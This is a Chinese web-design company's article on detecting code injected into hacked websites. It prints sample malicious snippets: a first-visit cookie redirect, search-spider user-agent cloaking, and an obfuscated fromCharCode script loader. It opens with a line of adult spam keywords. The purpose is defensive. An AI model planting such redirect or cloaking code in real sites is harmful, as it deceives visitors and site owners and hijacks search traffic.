国产人人模,人人爽,深爱开心高清在线观看,激情在线视频网站

霸州市網(wǎng)站被黑后，第一次打開會(huì)跳轉(zhuǎn)其他網(wǎng)頁(yè)，再打開則不會(huì)，如何查詢惡意代碼

時(shí)間：2024-06-01 來源：霸州市外貿(mào)網(wǎng)站建設(shè)

假如你的網(wǎng)站被黑了，第一次打開網(wǎng)頁(yè)時(shí)顯示跳轉(zhuǎn)到其他網(wǎng)站。再打開時(shí)卻正常。

不要以為網(wǎng)站沒事。請(qǐng)注意查一下類似于以下的代碼。

var c = document.cookie;
     if (c.indexOf('isfirstvisited=false') != -1) {
        
     }
     else {
         var d = new Date();
         d.setFullYear(d.getFullYear() + 1);
         document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString();
         location = 'https://baidu.com'
     }

這是以JS為例子，如果被植入的木馬在PHP中，大致雷同。

請(qǐng)務(wù)必進(jìn)行全站搜索相關(guān)關(guān)鍵詞

isfirstvisited

等

同時(shí)看一下后臺(tái)數(shù)據(jù)庫(kù)中有沒有被修改或者模板文件中被修改類似這樣的。

<script>if(navigator.userAgent.toLocaleLowerCase().indexOf('baidu') == -1)

另一種：

<script>
    if (!navigator.userAgent.match(/baiduspider|sogou|360spider|yisou/i)) {
        document.title = "正常的標(biāo)題";
    }
</script>

根據(jù)訪問者是否為特定爬蟲來決定是否動(dòng)態(tài)設(shè)置頁(yè)面標(biāo)題。這就是為了迷惑網(wǎng)站管理人員的，當(dāng)你直接打開網(wǎng)頁(yè)的時(shí)候，顯示正常的標(biāo)題，當(dāng)你通過搜索引擎打開就顯示他附加的另外的代碼設(shè)置的標(biāo)題，然后進(jìn)行跳轉(zhuǎn)，通常伴有內(nèi)似下面的代碼。

<noscript><title>字符#什么的</title>
<meta name="keywords" content="字符#什么的"/>
<meta name="description" content="字符#什么的"/></noscript>
<script type="text/javascript">;var bc = String.fromCharCode(104,106,115等一串?dāng)?shù)字實(shí)際上是生成一個(gè)動(dòng)態(tài)JS); var script = document.createElement('script'); script.src = bc; document.head.appendChild(script);</script>

TAG: